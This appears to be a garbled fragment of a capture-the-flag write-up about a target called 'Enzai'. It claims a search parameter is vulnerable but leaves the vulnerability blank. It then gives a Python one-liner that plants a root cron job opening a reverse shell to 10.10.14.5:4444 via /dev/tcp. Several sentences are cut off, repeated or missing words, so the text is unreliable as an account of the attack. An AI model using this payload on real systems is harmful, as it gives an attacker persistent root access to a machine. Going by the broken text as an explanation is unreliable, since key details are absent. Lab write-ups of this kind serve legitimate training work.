Enzai__x

The search box ( /search.php?q= ) is vulnerable to .

/usr/bin/python3 - <<'PY' import os,subprocess cmd = "echo '* * * * * root /bin/bash -c \"/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1\"' > /etc/cron.d/enzai_root" os.system(cmd) PY enzai__x

(If the platform uses a different flag format, replace accordingly.) The search box ( /search

Inside it lives a owned by root :